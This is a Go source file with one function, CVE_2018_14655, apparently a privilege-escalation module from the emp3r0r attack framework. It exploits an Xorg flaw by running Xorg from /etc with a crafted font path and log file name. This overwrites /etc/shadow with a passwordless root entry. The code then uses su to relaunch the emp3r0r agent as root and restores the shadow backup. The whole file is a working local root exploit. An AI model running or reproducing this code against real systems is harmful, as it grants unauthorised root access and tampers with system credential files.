package golpe

import (
	"context"
	"errors"
	"fmt"
	"log"
	"os"
	"os/exec"
	"strings"
	"time"

	"github.com/creack/pty"
)

// CVE_2018_14655 get root via xorg lpe CVE-2018-14655
func CVE_2018_14655() (err error) {
	var out []byte

	pwd, err := os.Getwd()
	if err != nil {
		return
	}

	ctx, cancel := context.WithCancel(context.Background())
	defer func() {
		cancel()
		e := os.Chdir(pwd)
		if e != nil {
			log.Printf("failed to cd back to %s\n%v", pwd, e)
		}
	}()

	if os.Chdir("/etc") != nil {
		return errors.New("Cannot cd to /etc")
	}
	exp := exec.Command("Xorg", "-fp", "root::16431:0:99999:7:::", "-logfile", "shadow", ":1")
	go func() {
		if ctx.Err() != nil {
			return
		}
		out, err = exp.CombinedOutput()
		if err != nil &&
			!strings.Contains(err.Error(), "signal: killed") {
			log.Printf("start xorg: %s\n%v", out, err)
			cancel()
		}
	}()
	time.Sleep(5 * time.Second)
	if ctx.Err() != nil {
		return fmt.Errorf("failed to run Xorg: %s\n%v", out, err)
	}
	if proc := exp.Process; proc != nil {
		err = exp.Process.Kill()
		if err != nil {
			return fmt.Errorf("failed to kill Xorg: %s\n%v", out, err)
		}
	}

	log.Println("GetRootXorg shadow is successfully overwritten")

	su := exec.Command("su", "-c", "./emp3r0r -replace")
	_, err = pty.Start(su)
	if err != nil {
		log.Println("Xorg start su in PTY: ", err)
		return
	}

	err = os.Rename("/etc/shadow.old", "/etc/shadow")
	if err != nil {
		log.Println("Restoring shadow: ", err)
		return
	}
	log.Println("GetRootXorg exited without error")

	return
}
